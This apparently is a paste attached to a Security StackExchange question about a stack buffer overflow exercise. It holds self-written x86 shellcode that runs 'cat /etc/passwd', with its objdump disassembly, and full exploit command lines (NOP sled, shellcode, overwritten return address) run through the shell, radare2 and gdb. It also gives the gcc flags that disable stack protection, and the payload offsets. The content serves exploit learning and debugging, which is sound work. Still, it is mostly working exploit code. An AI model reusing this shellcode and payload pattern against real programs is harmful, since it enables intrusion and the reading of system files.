- // Question URL: http://security.stackexchange.com/questions/148351/
- // Shellcode, which I built myself and which is intended to run `cat /etc/passwd`. It worked just fine in several exploits I did before:
- char[] shellcode = "\x31\xc0\x99\x52\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x89\xe3\x52\x68\x73\x73\x77\x64\x68\x2f\x2f\x70\x61\x68\x2f\x65\x74\x63\x89\xe1\x52\x51\x53\x89\xe1\xb0\x0b\xcd\x80"
- // Objdump of shellcode file:
- $ objdump -d shellcode.o
- shellcode.o: file format elf32-i386
- Disassembly of section .text:
- 00000000 <_start>:
- 0: 31 c0 xor %eax,%eax
- 2: 99 cltd
- 3: 52 push %edx
- 4: 68 2f 63 61 74 push $0x7461632f
- 9: 68 2f 62 69 6e push $0x6e69622f
- e: 89 e3 mov %esp,%ebx
- 10: 52 push %edx
- 11: 68 73 73 77 64 push $0x64777373
- 16: 68 2f 2f 70 61 push $0x61702f2f
- 1b: 68 2f 65 74 63 push $0x6374652f
- 20: 89 e1 mov %esp,%ecx
- 22: 52 push %edx
- 23: 51 push %ecx
- 24: 53 push %ebx
- 25: 89 e1 mov %esp,%ecx
- 27: b0 0b mov $0xb,%al
- 29: cd 80 int $0x80
- ----------
- // Command lines and arguments:
- // I tried to exploit the program in several ways; I'll paste a few of them here:
- // Simple shell execute //
- $ ./vuln $(python -c 'print "\x90"*28 + "\x31\xc0\x99\x52\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x89\xe3\x52\x68\x73\x73\x77\x64\x68\x2f\x2f\x70\x61\x68\x2f\x65\x74\x63\x89\xe1\x52\x51\x53\x89\xe1\xb0\x0b\xcd\x80" + "A"*5 + "\xd4\xd4\xff\xff"')
- // or read the payload from a file
- $ ./vuln $(cat payload)
- // RADARE2 //
- // Open the program in radare2:
- $ r2 -d ./vuln // open in debug mode
- // inside r2:
- // Reopen in debugger mode with args
- doo `!!python -c 'print "\x90"*28 + "\x31\xc0\x99\x52\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x89\xe3\x52\x68\x73\x73\x77\x64\x68\x2f\x2f\x70\x61\x68\x2f\x65\x74\x63\x89\xe1\x52\x51\x53\x89\xe1\xb0\x0b\xcd\x80" + "A"*5 + "\xd4\xd4\xff\xff"'`
- // GDB //
- (gdb) run $(python -c 'print "\x90"*28 + "\x31\xc0\x99\x52\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x89\xe3\x52\x68\x73\x73\x77\x64\x68\x2f\x2f\x70\x61\x68\x2f\x65\x74\x63\x89\xe1\x52\x51\x53\x89\xe1\xb0\x0b\xcd\x80" + "A"*5 + "\xd4\xd4\xff\xff"')
- // System details //
- $ uname -a
- Linux megabeets 4.4.0-34-generic #53-Ubuntu SMP Wed Jul 27 16:06:39 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
- $ file vuln
- ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=47ddbe5ef3c4c647670a8be51f2975c11a3501a6, not stripped
- // The program was compiled using this GCC command:
- $ gcc vuln.c -o vuln -fno-stack-protector -m32 -z execstack
- //////////////////
- // More details //
- //////////////////
- // Offset in the payload that overwrites EIP: 76
- // Payload length: 80
- // NOP-sled length: 28